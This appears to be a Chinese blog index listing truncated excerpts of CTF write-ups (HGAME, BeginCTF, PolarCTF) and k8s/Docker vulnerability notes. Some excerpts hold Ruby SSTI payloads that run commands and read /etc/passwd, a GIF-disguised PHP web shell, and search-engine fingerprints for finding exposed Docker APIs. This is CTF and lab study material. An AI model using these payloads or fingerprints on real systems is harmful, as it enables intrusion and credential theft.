polarctfre刷题记录
shell32bit 有upx的壳,解一下 ida即可 shift+f12 加加减减
my2023
...
HGAME-2024-WEEK-2-部分wp
WEBWhat the cow say?经过测试是ruby的ssti,默认的输入有给了尖括号了,而且我看网上的payload,都带= 123456789<%= system("whoami") %> #Execute code<%= Dir.entries('/') %> #List folder<%= File.open('/etc/passwd').read %> #Read file<%= system('cat /etc/passwd') %><%= `ls /` %><%= IO.popen('ls /').readlines() %><% require 'open3' %><% @a,@b,@c,@d=Open3.popen3('whoami') %><%= @b.readline()%><% require...
BeginCTF部分wp
miscTupper下载到压缩包后,解压可以看到有许多txt文件,每个里面可能是base64,写个脚本提取出来(找gpt) 1234567891011121314151617181920import os# 指定目录路径directory = 'G:\\ctf\\tupper'# 指定输出文件路径output_file = 'D:\\vscodework\\ctf\\beginctf\\output.txt'# 获取目录下的所有文件名,并按数字排序file_names = [f for f in os.listdir(directory) if f.endswith('.txt')]file_names.sort(key=lambda x: int(x[:-4]))# 遍历文件名列表,并将内容写入输出文件中with open(output_file, 'w') as f: for file_name in file_names: file_path =...
HGAME-2024-WEEK-1-部分wp
webreverseezIDA下载程序直接,记事本右键打开就可以了, ezASM1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162section .data c db 74, 69, 67, 79, 71, 89, 99, 113, 111, 125, 107, 81, 125, 107, 79, 82, 18, 80, 86, 22, 76, 86, 125, 22, 125, 112, 71, 84, 17, 80, 81, 17, 95, 34 flag db 33 dup(0) format db "plz input your flag: ", 0 success db "Congratulations!", 0 failure db "Sry, plz try again", 0section...
polarctfweb刷题记录2
webezupload文件上传,随便穿一个东西发现需要传gif,改一个 123Content-Type: image/gifGIF89A<?php eval($_POST['a']);?> 即可 自由的文件上传系统文件上传+文件包含随意传个文件,包含一下即可 代码审计1给了源码 1234567891011<?phphighlight_file(__FILE__);include('flag.php');$sys = $_GET['sys'];if (preg_match("|flag|", $xsx)) { die("flag is no here!");} else { $xsx = $_GET['xsx']; echo new $sys($xsx);} 当我们看到new...
k8s学习及漏洞复现-下
1.1docker remote api (2375)k8s与docker总是并行出现的,那么如果docker出现问题,也将是严重的。这里笔者学习复现一下docker的漏洞,docker远程访问漏洞。fofa指纹app="docker-Daemon" shodan **port:”2375″ country:”JP” Docker**测试是否存在漏洞,这里可以看到,fofa出来的并不是都是2375端口,也可能是附近的,都一样,正常是404,然后加个version,或者2376/containers/json出现信息,也可证明存在漏洞 也可以使用命令进行获取到相关容器。 1.2搭建本地漏洞接下来的操作没有授权,就搭建了一个环境,使用vulhub搭建,很方便。https://github.com/vulhub/vulhub,安装完docker即可 123cd /vulhub/docker/unauthorized-rcedocker-compose builddocker-compose up -d 这里我们pull一个镜像,这里报了一个错,Using...
k8s学习及漏洞复现-上
k8s基础知识常见的pod状态 pod pod常见的状态:第一阶段:挂起(Pending):1、正在创建Pod但是Pod中的容器还没有全部被创建完成,处于此状态的Pod应该检查Pod依赖的存储是否有权限挂载、镜像是否可以下载、调度是否正常等2、我们在请求创建pod时,条件不满足,调度没有完成,没有任何一个节点能满足调度条件,已经创建了pod但是没有适合它运行的节点叫做挂起,调度没有完成。 失败(Failed):Pod 中的所有容器都已终止了,并且至少有一个容器是因为失败终止。也就是说,容器以非0状态退出或者被系统终止。未知(Unknown):未知状态,所谓pod是什么状态是apiserver和运行在pod节点的kubelet进行通信获取状态信息的,如果节点之上的kubelet本身出故障,那么apiserver就连不上kubelet,得不到信息了,就会看Unknown,通常是由于与pod所在的node节点通信错误。 Error 状态:Pod...
polarctfweb刷题记录
misc0和255给到一个py文件,是图片生成坐标点的,也给了坐标点,找chatgpt问一下还原一下代码 12345678910111213141516171819from PIL import Image# 输入坐标点列表image_list = [[255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255], [255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255], [255, 255, 255, 255, 255, 255, 255,...